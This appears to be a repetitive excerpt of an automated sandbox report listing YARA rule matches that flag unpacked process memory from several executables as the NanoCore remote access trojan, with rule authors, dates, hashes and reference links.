            Source: 21.0.Synaptics.exe.4b8e54.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 21.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.2.WINDOWS.EXE.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.3353bdc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.3353bdc.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.2.Synaptics.exe.4b8e54.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 16.2.._cache_WINDOWS.EXE.437ebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 21.2.Synaptics.exe.4c4d1c.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.4b8e54.23.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.16.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3bdebcc.4.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.4b8e54.28.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 20.0.Synaptics.exe.584130.29.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.0.Synaptics.exe.400000.12.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 19.0.dhcpmon.exe.e20000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.24.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 11.2.._cache_WINDOWS.EXE.3be31f5.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 4.2.y8kdmHi6x3.exe.584130.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 9.0.WINDOWS.EXE.4b8e14.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.4c4d1c.17.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 23.0.Synaptics.exe.584130.24.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 8.2.Synaptics.exe.4cbff6c.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.Synaptics.exe.4b8e54.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 23.0.Synaptics.exe.400000.14.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 19.2.dhcpmon.exe.4619d96.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 4.0.y8kdmHi6x3.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: Malware_QA_update date = 2016-08-29, hash2 = 6415b45f5bae6429dd5d92d6cae46e8a704873b7090853e68e80cd179058903e, author = Florian Roth, description = VT Research QA uploaded malware - file update.exe, reference = VT Research QA, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 6d805533623d7063241620eec38b7eb9b625533ccadeaf4f6c2cc6db32711541
            Source: 20.2.Synaptics.exe.4b8e54.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
